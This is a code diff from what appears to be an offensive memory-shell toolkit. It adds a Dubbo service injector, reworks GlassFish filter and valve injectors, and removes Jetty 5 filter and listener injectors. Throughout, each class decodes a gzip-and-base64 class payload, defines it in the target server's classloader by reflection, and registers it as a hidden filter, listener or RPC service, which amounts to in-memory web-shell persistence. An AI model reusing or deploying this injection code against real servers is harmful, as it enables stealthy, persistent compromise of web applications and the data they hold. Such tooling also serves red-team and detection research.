String strStringValue = stringValue(invokeNoArgs(obj, "getProtocol"), "dubbo");
|
||||
String strNormalizePath = normalizePath(stringValue(invokeNoArgs(obj, "getPath"), ""));
|
||||
Integer numIntegerValue = integerValue(invokeNoArgs(obj, "getPort"));
|
||||
return (numIntegerValue == null || numIntegerValue.intValue() <= 0) ? String.format("%s://%s/%s", strStringValue, DISPLAY_HOST, strNormalizePath) : String.format("%s://%s:%d/%s", strStringValue, DISPLAY_HOST, numIntegerValue, strNormalizePath);
|
||||
}
|
||||
|
||||
private String formatProtocolAddress(Object obj, String str) {
|
||||
String strStringValue = stringValue(invokeNoArgs(obj, "getName"), "dubbo");
|
||||
Integer numIntegerValue = integerValue(invokeNoArgs(obj, "getPort"));
|
||||
return (numIntegerValue == null || numIntegerValue.intValue() <= 0) ? String.format("%s://%s/%s", strStringValue, DISPLAY_HOST, str) : String.format("%s://%s:%d/%s", strStringValue, DISPLAY_HOST, numIntegerValue, str);
|
||||
}
|
||||
|
||||
private String stringValue(Object obj, String str) {
|
||||
return (!(obj instanceof String) || ((String) obj).isEmpty()) ? str : (String) obj;
|
||||
}
|
||||
|
||||
private Integer integerValue(Object obj) {
|
||||
if (obj instanceof Number) {
|
||||
return Integer.valueOf(((Number) obj).intValue());
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
private List<ProtocolConfig> castProtocols(List<?> list) {
|
||||
return list.stream()
|
||||
.filter(ProtocolConfig.class::isInstance)
|
||||
.map(ProtocolConfig.class::cast)
|
||||
.collect(Collectors.toList());
|
||||
}
|
||||
|
||||
private List<ProtocolConfig> mergeProtocols(Collection<ProtocolConfig> collection, Collection<ProtocolConfig> collection2) {
|
||||
LinkedHashMap<String, ProtocolConfig> linkedHashMap = new LinkedHashMap<>();
|
||||
addProtocols(linkedHashMap, collection);
|
||||
addProtocols(linkedHashMap, collection2);
|
||||
return new ArrayList<>(linkedHashMap.values());
|
||||
}
|
||||
|
||||
private void addProtocols(Map<String, ProtocolConfig> map, Collection<ProtocolConfig> collection) {
|
||||
if (collection == null) {
|
||||
return;
|
||||
}
|
||||
for (ProtocolConfig protocolConfig : collection) {
|
||||
if (protocolConfig != null) {
|
||||
map.put(protocolKey(protocolConfig), protocolConfig);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
private String protocolKey(ProtocolConfig protocolConfig) {
|
||||
return String.valueOf(protocolConfig.getName()) + "|" + String.valueOf(protocolConfig.getHost()) + "|" + String.valueOf(protocolConfig.getPort()) + "|" + String.valueOf(protocolConfig.getServer()) + "|" + String.valueOf(protocolConfig.getId());
|
||||
}
|
||||
|
||||
private String getErrorMessage(Throwable th) {
|
||||
try (ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
|
||||
PrintStream printStream = new PrintStream(byteArrayOutputStream)) {
|
||||
th.printStackTrace(printStream);
|
||||
return byteArrayOutputStream.toString();
|
||||
} catch (IOException e) {
|
||||
return String.valueOf(th);
|
||||
}
|
||||
}
|
||||
}
|
||||
+283
@@ -0,0 +1,283 @@
|
||||
package com.reajason.javaweb.memshell.injector.dubbo;
|
||||
|
||||
import org.apache.dubbo.common.bytecode.ClassGenerator;
|
||||
import org.apache.dubbo.common.utils.ClassUtils;
|
||||
import org.apache.dubbo.common.utils.NetUtils;
|
||||
import org.apache.dubbo.config.ProtocolConfig;
|
||||
import org.apache.dubbo.config.RegistryConfig;
|
||||
import org.apache.dubbo.config.ServiceConfig;
|
||||
import org.apache.dubbo.config.context.ConfigManager;
|
||||
import org.apache.dubbo.rpc.model.ApplicationModel;
|
||||
|
||||
import java.io.ByteArrayInputStream;
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.PrintStream;
|
||||
import java.lang.reflect.Constructor;
|
||||
import java.lang.reflect.Method;
|
||||
import java.lang.reflect.Modifier;
|
||||
import java.util.ArrayList;
|
||||
import java.util.Collection;
|
||||
import java.util.List;
|
||||
import java.util.Map;
|
||||
import java.util.concurrent.ConcurrentHashMap;
|
||||
import java.util.stream.Collectors;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
public class DubboServiceInjector {
|
||||
private final Map<String, ServiceConfig<?>> dynamicServices = new ConcurrentHashMap<>();
|
||||
private static String msg = "";
|
||||
private static boolean ok = false;
|
||||
|
||||
public String getUrlPattern() {
|
||||
return "{{urlPattern}}";
|
||||
}
|
||||
|
||||
public String getClassName() {
|
||||
return "{{className}}";
|
||||
}
|
||||
|
||||
public String getBase64String() {
|
||||
return "{{base64Str}}";
|
||||
}
|
||||
|
||||
public String getHelperBase64String() {
|
||||
return "{{helperBase64String}}";
|
||||
}
|
||||
|
||||
public DubboServiceInjector() {
|
||||
if (ok) {
|
||||
return;
|
||||
}
|
||||
try {
|
||||
msg += registerService();
|
||||
} catch (Throwable e) {
|
||||
msg += "unexcepted error: " + getErrorMessage(e);
|
||||
}
|
||||
ok = true;
|
||||
System.out.println(msg);
|
||||
}
|
||||
|
||||
private Class<?> getShell(String base64String) throws Exception {
|
||||
ClassLoader classLoader = ClassUtils.getClassLoader(ClassGenerator.class);
|
||||
Class<?> clazz = null;
|
||||
try {
|
||||
clazz = classLoader.loadClass(getClassName());
|
||||
} catch (Exception e) {
|
||||
byte[] clazzByte = gzipDecompress(decodeBase64(base64String));
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass",
|
||||
String.class, byte[].class, int.class, int.class, java.security.ProtectionDomain.class);
|
||||
defineClass.setAccessible(true);
|
||||
clazz = (Class<?>) defineClass.invoke(classLoader, null, clazzByte, 0, clazzByte.length,
|
||||
ClassGenerator.class.getProtectionDomain());
|
||||
registerInJavassistClassPool(classLoader, clazzByte);
|
||||
}
|
||||
msg += "[" + classLoader.getClass().getName() + "] ";
|
||||
return clazz;
|
||||
}
|
||||
|
||||
private void registerInJavassistClassPool(ClassLoader classLoader, byte[] classBytes) {
|
||||
try {
|
||||
Object pool = ClassGenerator.getClassPool(classLoader);
|
||||
pool.getClass().getMethod("makeClass", java.io.InputStream.class)
|
||||
.invoke(pool, new ByteArrayInputStream(classBytes));
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] decodeBase64(String base64Str) throws Exception {
|
||||
Class<?> decoderClass;
|
||||
try {
|
||||
decoderClass = Class.forName("java.util.Base64");
|
||||
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
|
||||
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
|
||||
} catch (Exception ignored) {
|
||||
decoderClass = Class.forName("sun.misc.BASE64Decoder");
|
||||
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
|
||||
ByteArrayOutputStream out = new ByteArrayOutputStream();
|
||||
GZIPInputStream gzipInputStream = null;
|
||||
try {
|
||||
gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData));
|
||||
byte[] buffer = new byte[4096];
|
||||
int n;
|
||||
while ((n = gzipInputStream.read(buffer)) > 0) {
|
||||
out.write(buffer, 0, n);
|
||||
}
|
||||
return out.toByteArray();
|
||||
} finally {
|
||||
if (gzipInputStream != null) {
|
||||
gzipInputStream.close();
|
||||
}
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
public String registerService() throws Throwable {
|
||||
String normalizedPath = normalizePath(getUrlPattern());
|
||||
if (normalizedPath.isEmpty()) {
|
||||
throw new IllegalArgumentException("path must not be empty");
|
||||
}
|
||||
|
||||
if (dynamicServices.containsKey(normalizedPath)) {
|
||||
return resolveServiceAddresses(normalizedPath);
|
||||
}
|
||||
|
||||
if (isPathRegisteredInFramework(normalizedPath)) {
|
||||
return resolveServiceAddresses(normalizedPath);
|
||||
}
|
||||
Class<?> interfaceClass = getShell(getHelperBase64String());
|
||||
Class<?> implementationClass = getShell(getBase64String());
|
||||
validateServiceTypes(interfaceClass, implementationClass);
|
||||
|
||||
Object serviceInstance = instantiate(implementationClass);
|
||||
ServiceConfig<Object> serviceConfig = createServiceConfig(normalizedPath, interfaceClass, serviceInstance);
|
||||
ServiceConfig<?> previous = dynamicServices.putIfAbsent(normalizedPath, serviceConfig);
|
||||
if (previous != null) {
|
||||
return resolveServiceAddresses(normalizedPath);
|
||||
}
|
||||
|
||||
try {
|
||||
serviceConfig.export();
|
||||
return resolveServiceAddresses(normalizedPath);
|
||||
} catch (RuntimeException e) {
|
||||
dynamicServices.remove(normalizedPath, serviceConfig);
|
||||
throw e;
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private boolean isPathRegisteredInFramework(String path) {
|
||||
try {
|
||||
for (Object service : getRegisteredServices()) {
|
||||
try {
|
||||
Method getPath = service.getClass().getMethod("getPath");
|
||||
if (path.equals(getPath.invoke(service))) {
|
||||
return true;
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private Collection<?> getRegisteredServices() {
|
||||
try {
|
||||
ConfigManager configManager = ApplicationModel.getConfigManager();
|
||||
Method getServices = configManager.getClass().getMethod("getServices");
|
||||
return (Collection<?>) getServices.invoke(configManager);
|
||||
} catch (Exception e) {
|
||||
try {
|
||||
Method defaultModel = ApplicationModel.class.getMethod("defaultModel");
|
||||
Object model = defaultModel.invoke(null);
|
||||
Method getDefaultModule = model.getClass().getMethod("getDefaultModule");
|
||||
Object moduleModel = getDefaultModule.invoke(model);
|
||||
Method getConfigManager = moduleModel.getClass().getMethod("getConfigManager");
|
||||
Object moduleConfigManager = getConfigManager.invoke(moduleModel);
|
||||
Method getServices = moduleConfigManager.getClass().getMethod("getServices");
|
||||
return (Collection<?>) getServices.invoke(moduleConfigManager);
|
||||
} catch (Exception ex) {
|
||||
return new ArrayList<>();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
private String normalizePath(String path) {
|
||||
if (path == null) {
|
||||
return "";
|
||||
}
|
||||
String normalized = path.trim();
|
||||
while (normalized.startsWith("/")) {
|
||||
normalized = normalized.substring(1);
|
||||
}
|
||||
return normalized;
|
||||
}
|
||||
|
||||
private void validateServiceTypes(Class<?> interfaceClass, Class<?> implementationClass) {
|
||||
if (!interfaceClass.isInterface()) {
|
||||
throw new IllegalArgumentException("not an interface: " + interfaceClass.getName());
|
||||
}
|
||||
if (implementationClass.isInterface() || Modifier.isAbstract(implementationClass.getModifiers())) {
|
||||
throw new IllegalArgumentException("implementation class is not instantiable: " + implementationClass.getName());
|
||||
}
|
||||
if (!interfaceClass.isAssignableFrom(implementationClass)) {
|
||||
throw new IllegalArgumentException(implementationClass.getName()
|
||||
+ " does not implement " + interfaceClass.getName());
|
||||
}
|
||||
}
|
||||
|
||||
private Object instantiate(Class<?> implementationClass) {
|
||||
try {
|
||||
Constructor<?> constructor = implementationClass.getDeclaredConstructor();
|
||||
constructor.setAccessible(true);
|
||||
return constructor.newInstance();
|
||||
} catch (ReflectiveOperationException e) {
|
||||
throw new IllegalArgumentException("failed to instantiate " + implementationClass.getName(), e);
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
||||
private ServiceConfig<Object> createServiceConfig(String path, Class<?> interfaceClass, Object serviceInstance) {
|
||||
ConfigManager configManager = ApplicationModel.getConfigManager();
|
||||
|
||||
ServiceConfig serviceConfig = new ServiceConfig();
|
||||
serviceConfig.setInterface(interfaceClass);
|
||||
serviceConfig.setRef(serviceInstance);
|
||||
serviceConfig.setPath(path);
|
||||
serviceConfig.setVersion("1.0.0");
|
||||
serviceConfig.setProxy("jdk");
|
||||
serviceConfig.setApplication(configManager.getApplication().orElse(null));
|
||||
|
||||
List<ProtocolConfig> protocols = new ArrayList<>(configManager.getDefaultProtocols());
|
||||
if (protocols.isEmpty()) {
|
||||
protocols = new ArrayList<>(configManager.getProtocols());
|
||||
}
|
||||
serviceConfig.setProtocols(protocols);
|
||||
|
||||
List<RegistryConfig> registries = new ArrayList<>(configManager.getDefaultRegistries());
|
||||
if (registries.isEmpty()) {
|
||||
registries = new ArrayList<>(configManager.getRegistries());
|
||||
}
|
||||
serviceConfig.setRegistries(registries);
|
||||
|
||||
return serviceConfig;
|
||||
}
|
||||
|
||||
private String resolveServiceAddresses(String path) {
|
||||
ConfigManager configManager = ApplicationModel.getConfigManager();
|
||||
List<ProtocolConfig> protocols = configManager.getDefaultProtocols();
|
||||
if (protocols.isEmpty()) {
|
||||
protocols = new ArrayList<>(configManager.getProtocols());
|
||||
}
|
||||
if (protocols.isEmpty()) {
|
||||
return path;
|
||||
}
|
||||
String localHost = NetUtils.getLocalHost();
|
||||
return protocols.stream()
|
||||
.map(pc -> String.format("%s://%s:%d/%s", pc.getName(), localHost, pc.getPort(), path))
|
||||
.collect(Collectors.joining(", "));
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getErrorMessage(Throwable throwable) {
|
||||
PrintStream printStream = null;
|
||||
try {
|
||||
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
|
||||
printStream = new PrintStream(outputStream);
|
||||
throwable.printStackTrace(printStream);
|
||||
return outputStream.toString();
|
||||
} finally {
|
||||
if (printStream != null) {
|
||||
printStream.close();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
+2
-44
@@ -87,58 +87,16 @@ public class GlassFishFilterInjector {
|
||||
Set<Thread> threads = Thread.getAllStackTraces().keySet();
|
||||
for (Thread thread : threads) {
|
||||
if (thread.getName().contains("ContainerBackgroundProcessor")) {
|
||||
Object target = getThreadTarget(thread);
|
||||
if (target == null) {
|
||||
continue;
|
||||
}
|
||||
Object container = getContainerFromProcessor(target);
|
||||
if (container == null) {
|
||||
continue;
|
||||
}
|
||||
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(container, "children");
|
||||
if (childrenMap == null) {
|
||||
continue;
|
||||
}
|
||||
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(getFieldValue(getFieldValue(thread, "target"), "this$0"), "children");
|
||||
for (Object value : childrenMap.values()) {
|
||||
Map<?, ?> children = (Map<?, ?>) getFieldValue(value, "children");
|
||||
if (children != null) {
|
||||
contexts.addAll(children.values());
|
||||
}
|
||||
contexts.addAll(children.values());
|
||||
}
|
||||
}
|
||||
}
|
||||
return contexts;
|
||||
}
|
||||
|
||||
private Object getThreadTarget(Thread thread) throws Exception {
|
||||
Object target = getFieldValue(thread, "target");
|
||||
if (target == null) {
|
||||
// JDK 21+
|
||||
Object holder = getFieldValue(thread, "holder");
|
||||
if (holder != null) {
|
||||
target = getFieldValue(holder, "task");
|
||||
}
|
||||
}
|
||||
return target;
|
||||
}
|
||||
|
||||
/**
|
||||
* Older GlassFish/Payara: ContainerBackgroundProcessor.this$0
|
||||
* Payara 6.2024+/7: ContainerBackgroundProcessorAtomic.base (WeakReference)
|
||||
*/
|
||||
private Object getContainerFromProcessor(Object target) throws Exception {
|
||||
Object container = getFieldValue(target, "this$0");
|
||||
if (container != null) {
|
||||
return container;
|
||||
}
|
||||
Object atomic = getFieldValue(target, "containerBackgroundProcessorAtomic");
|
||||
Object base = atomic != null ? getFieldValue(atomic, "base") : getFieldValue(target, "base");
|
||||
if (base instanceof java.lang.ref.Reference) {
|
||||
return ((java.lang.ref.Reference<?>) base).get();
|
||||
}
|
||||
return base;
|
||||
}
|
||||
|
||||
private ClassLoader getWebAppClassLoader(Object context) throws Exception {
|
||||
try {
|
||||
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
|
||||
|
||||
+1
-43
@@ -76,15 +76,7 @@ public class GlassFishValveInjector {
|
||||
Set<Thread> threads = Thread.getAllStackTraces().keySet();
|
||||
for (Thread thread : threads) {
|
||||
if (thread.getName().contains("ContainerBackgroundProcessor")) {
|
||||
Object target = getThreadTarget(thread);
|
||||
if (target == null) {
|
||||
continue;
|
||||
}
|
||||
Object container = getContainerFromProcessor(target);
|
||||
if (container == null) {
|
||||
continue;
|
||||
}
|
||||
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(container, "children");
|
||||
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(getFieldValue(getFieldValue(thread, "target"), "this$0"), "children");
|
||||
Collection<?> values = childrenMap.values();
|
||||
for (Object value : values) {
|
||||
Map<?, ?> children = (Map<?, ?>) getFieldValue(value, "children");
|
||||
@@ -95,40 +87,6 @@ public class GlassFishValveInjector {
|
||||
return contexts;
|
||||
}
|
||||
|
||||
private Object getThreadTarget(Thread thread) throws Exception {
|
||||
try {
|
||||
return getFieldValue(thread, "target");
|
||||
} catch (NoSuchFieldException e) {
|
||||
// JDK 21+
|
||||
return getFieldValue(getFieldValue(thread, "holder"), "task");
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Older GlassFish/Payara: ContainerBackgroundProcessor.this$0
|
||||
* Payara 6.2024+/7: ContainerBackgroundProcessorAtomic.base (WeakReference)
|
||||
*/
|
||||
private Object getContainerFromProcessor(Object target) throws Exception {
|
||||
try {
|
||||
return getFieldValue(target, "this$0");
|
||||
} catch (NoSuchFieldException ignored) {
|
||||
}
|
||||
try {
|
||||
Object atomic = getFieldValue(target, "containerBackgroundProcessorAtomic");
|
||||
Object base = getFieldValue(atomic, "base");
|
||||
if (base instanceof java.lang.ref.Reference) {
|
||||
return ((java.lang.ref.Reference<?>) base).get();
|
||||
}
|
||||
return base;
|
||||
} catch (NoSuchFieldException ignored) {
|
||||
}
|
||||
Object base = getFieldValue(target, "base");
|
||||
if (base instanceof java.lang.ref.Reference) {
|
||||
return ((java.lang.ref.Reference<?>) base).get();
|
||||
}
|
||||
return base;
|
||||
}
|
||||
|
||||
private ClassLoader getWebAppClassLoader(Object context) throws Exception {
|
||||
try {
|
||||
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
|
||||
|
||||
-297
@@ -1,297 +0,0 @@
|
||||
package com.reajason.javaweb.memshell.injector.jetty;
|
||||
|
||||
import java.io.ByteArrayInputStream;
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.PrintStream;
|
||||
import java.lang.reflect.Field;
|
||||
import java.lang.reflect.InvocationTargetException;
|
||||
import java.lang.reflect.Method;
|
||||
import java.util.HashSet;
|
||||
import java.util.List;
|
||||
import java.util.Map;
|
||||
import java.util.Set;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
/**
|
||||
* @author ReaJason
|
||||
* @since 2026/7/4
|
||||
*/
|
||||
public class Jetty5FilterInjector {
|
||||
|
||||
private static String msg = "";
|
||||
private static boolean ok = false;
|
||||
|
||||
public String getUrlPattern() {
|
||||
return "{{urlPattern}}";
|
||||
}
|
||||
|
||||
public String getClassName() {
|
||||
return "{{className}}";
|
||||
}
|
||||
|
||||
public String getBase64String() throws IOException {
|
||||
return "{{base64Str}}";
|
||||
}
|
||||
|
||||
public Jetty5FilterInjector() {
|
||||
if (ok) {
|
||||
return;
|
||||
}
|
||||
Set<Object> contexts = null;
|
||||
try {
|
||||
contexts = getContext();
|
||||
} catch (Throwable throwable) {
|
||||
msg += "context error: " + getErrorMessage(throwable);
|
||||
}
|
||||
if (contexts == null || contexts.isEmpty()) {
|
||||
msg += "context not found";
|
||||
} else {
|
||||
for (Object context : contexts) {
|
||||
try {
|
||||
msg += ("context: [" + getContextRoot(context) + "] ");
|
||||
Object shell = getShell(context);
|
||||
inject(context, shell);
|
||||
msg += "[" + getUrlPattern() + "] ready\n";
|
||||
} catch (Throwable e) {
|
||||
msg += "failed " + getErrorMessage(e) + "\n";
|
||||
}
|
||||
}
|
||||
}
|
||||
ok = true;
|
||||
System.out.println(msg);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getContextRoot(Object context) {
|
||||
String r = null;
|
||||
try {
|
||||
r = (String) invokeMethod(context, "getContextPath");
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
String c = context.getClass().getName();
|
||||
if (r == null) {
|
||||
return c;
|
||||
}
|
||||
if (r.isEmpty()) {
|
||||
return c + "(/)";
|
||||
}
|
||||
return c + "(" + r + ")";
|
||||
}
|
||||
|
||||
public void inject(Object context, Object filter) throws Exception {
|
||||
Object webApplicationHandler = getWebApplicationHandler(context);
|
||||
|
||||
if (invokeMethod(webApplicationHandler, "getFilter", new Class[]{String.class}, new Object[]{getClassName()}) != null) {
|
||||
return;
|
||||
}
|
||||
|
||||
Object filterHolder = invokeMethod(
|
||||
webApplicationHandler,
|
||||
"defineFilter",
|
||||
new Class[]{String.class, String.class},
|
||||
new Object[]{getClassName(), getClassName()});
|
||||
if (invokeMethod(filterHolder, "getFilter") == null) {
|
||||
invokeMethod(filterHolder, "start");
|
||||
}
|
||||
invokeMethod(
|
||||
webApplicationHandler,
|
||||
"addFilterPathMapping",
|
||||
new Class[]{String.class, String.class, int.class},
|
||||
new Object[]{getUrlPattern(), getClassName(), Integer.valueOf(1)});
|
||||
moveLastPathFilterToFront(webApplicationHandler);
|
||||
clearChainCache(webApplicationHandler);
|
||||
}
|
||||
|
||||
@Override
|
||||
public String toString() {
|
||||
return msg;
|
||||
}
|
||||
|
||||
/**
|
||||
* org.mortbay.jetty.servlet.WebApplicationContext
|
||||
*/
|
||||
public Set<Object> getContext() throws Exception {
|
||||
Set<Object> contexts = new HashSet<Object>();
|
||||
Set<Thread> threads = Thread.getAllStackTraces().keySet();
|
||||
for (Thread thread : threads) {
|
||||
try {
|
||||
Object contextClassLoader = invokeMethod(thread, "getContextClassLoader");
|
||||
String name = contextClassLoader.getClass().getName();
|
||||
if (name.endsWith("ContextLoader")) {
|
||||
contexts.add(getFieldValue(contextClassLoader, "_context"));
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
}
|
||||
return contexts;
|
||||
}
|
||||
|
||||
public ClassLoader getWebAppClassLoader(Object context) throws Exception {
|
||||
try {
|
||||
return ((ClassLoader) invokeMethod(context, "getClassLoader"));
|
||||
} catch (Exception e) {
|
||||
return ((ClassLoader) getFieldValue(context, "_classLoader"));
|
||||
}
|
||||
}
|
||||
|
||||
public Object getWebApplicationHandler(Object context) throws Exception {
|
||||
try {
|
||||
Object webApplicationHandler = invokeMethod(context, "getWebApplicationHandler");
|
||||
if (webApplicationHandler != null) {
|
||||
return webApplicationHandler;
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
try {
|
||||
Object webApplicationHandler = getFieldValue(context, "_webAppHandler");
|
||||
if (webApplicationHandler != null) {
|
||||
return webApplicationHandler;
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
return getFieldValue(context, "_servletHandler");
|
||||
}
|
||||
|
||||
private void moveLastPathFilterToFront(Object webApplicationHandler) {
|
||||
try {
|
||||
List pathFilters = (List) getFieldValue(webApplicationHandler, "_pathFilters");
|
||||
if (pathFilters != null && pathFilters.size() > 1) {
|
||||
Object filterMapping = pathFilters.remove(pathFilters.size() - 1);
|
||||
pathFilters.add(0, filterMapping);
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
|
||||
private void clearChainCache(Object webApplicationHandler) {
|
||||
clearCacheField(webApplicationHandler, "_chainCache");
|
||||
clearCacheField(webApplicationHandler, "_namedChainCache");
|
||||
}
|
||||
|
||||
private void clearCacheField(Object object, String name) {
|
||||
try {
|
||||
Object cache = getFieldValue(object, name);
|
||||
if (cache instanceof Map[]) {
|
||||
Map[] maps = (Map[]) cache;
|
||||
for (int i = 0; i < maps.length; i++) {
|
||||
if (maps[i] != null) {
|
||||
maps[i].clear();
|
||||
}
|
||||
}
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private Object getShell(Object context) throws Exception {
|
||||
ClassLoader classLoader = getWebAppClassLoader(context);
|
||||
Class<?> clazz = null;
|
||||
try {
|
||||
clazz = classLoader.loadClass(getClassName());
|
||||
} catch (Exception e) {
|
||||
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
|
||||
defineClass.setAccessible(true);
|
||||
clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
|
||||
}
|
||||
msg += "[" + classLoader.getClass().getName() + "] ";
|
||||
return clazz.newInstance();
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] decodeBase64(String base64Str) throws Exception {
|
||||
Class<?> decoderClass;
|
||||
try {
|
||||
decoderClass = Class.forName("java.util.Base64");
|
||||
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
|
||||
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
|
||||
} catch (Exception ignored) {
|
||||
decoderClass = Class.forName("sun.misc.BASE64Decoder");
|
||||
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
|
||||
ByteArrayOutputStream out = new ByteArrayOutputStream();
|
||||
GZIPInputStream gzipInputStream = null;
|
||||
try {
|
||||
gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData));
|
||||
byte[] buffer = new byte[4096];
|
||||
int n;
|
||||
while ((n = gzipInputStream.read(buffer)) > 0) {
|
||||
out.write(buffer, 0, n);
|
||||
}
|
||||
return out.toByteArray();
|
||||
} finally {
|
||||
if (gzipInputStream != null) {
|
||||
gzipInputStream.close();
|
||||
}
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static Object getFieldValue(Object obj, String name) throws Exception {
|
||||
Class<?> clazz = obj.getClass();
|
||||
while (clazz != Object.class) {
|
||||
try {
|
||||
Field field = clazz.getDeclaredField(name);
|
||||
field.setAccessible(true);
|
||||
return field.get(obj);
|
||||
} catch (NoSuchFieldException var5) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
throw new NoSuchFieldException(obj.getClass().getName() + " Field not found: " + name);
|
||||
}
|
||||
|
||||
public static Object invokeMethod(Object targetObject, String methodName) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException {
|
||||
return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static Object invokeMethod(Object obj, String methodName, Class<?>[] paramClazz, Object[] param) throws NoSuchMethodException {
|
||||
try {
|
||||
Class<?> clazz = (obj instanceof Class) ? (Class<?>) obj : obj.getClass();
|
||||
Method method = null;
|
||||
while (clazz != null && method == null) {
|
||||
try {
|
||||
if (paramClazz == null) {
|
||||
method = clazz.getDeclaredMethod(methodName);
|
||||
} else {
|
||||
method = clazz.getDeclaredMethod(methodName, paramClazz);
|
||||
}
|
||||
} catch (NoSuchMethodException e) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
if (method == null) {
|
||||
throw new NoSuchMethodException("Method not found: " + methodName);
|
||||
}
|
||||
method.setAccessible(true);
|
||||
return method.invoke(obj instanceof Class ? null : obj, param);
|
||||
} catch (NoSuchMethodException e) {
|
||||
throw e;
|
||||
} catch (Exception e) {
|
||||
throw new RuntimeException("Error invoking method: " + methodName, e);
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getErrorMessage(Throwable throwable) {
|
||||
PrintStream printStream = null;
|
||||
try {
|
||||
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
|
||||
printStream = new PrintStream(outputStream);
|
||||
throwable.printStackTrace(printStream);
|
||||
return outputStream.toString();
|
||||
} finally {
|
||||
if (printStream != null) {
|
||||
printStream.close();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
-440
@@ -1,440 +0,0 @@
|
||||
package com.reajason.javaweb.memshell.injector.jetty;
|
||||
|
||||
import java.io.ByteArrayInputStream;
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.PrintStream;
|
||||
import java.lang.reflect.Array;
|
||||
import java.lang.reflect.Field;
|
||||
import java.lang.reflect.InvocationTargetException;
|
||||
import java.lang.reflect.Method;
|
||||
import java.util.EventListener;
|
||||
import java.util.HashSet;
|
||||
import java.util.List;
|
||||
import java.util.Map;
|
||||
import java.util.Set;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
/**
|
||||
* @author ReaJason
|
||||
* @since 2026/7/4
|
||||
*/
|
||||
public class Jetty5ListenerInjector {
|
||||
|
||||
private static String msg = "";
|
||||
private static boolean ok = false;
|
||||
|
||||
public String getClassName() {
|
||||
return "{{className}}";
|
||||
}
|
||||
|
||||
public String getBase64String() throws IOException {
|
||||
return "{{base64Str}}";
|
||||
}
|
||||
|
||||
public Jetty5ListenerInjector() {
|
||||
if (ok) {
|
||||
return;
|
||||
}
|
||||
Set<Object> contexts = null;
|
||||
try {
|
||||
contexts = getContext();
|
||||
} catch (Throwable throwable) {
|
||||
msg += "context error: " + getErrorMessage(throwable);
|
||||
}
|
||||
if (contexts == null || contexts.isEmpty()) {
|
||||
msg += "context not found";
|
||||
} else {
|
||||
for (Object context : contexts) {
|
||||
try {
|
||||
msg += ("context: [" + getContextRoot(context) + "] ");
|
||||
Object shell = getShell(context);
|
||||
inject(context, shell);
|
||||
msg += "[/*] ready\n";
|
||||
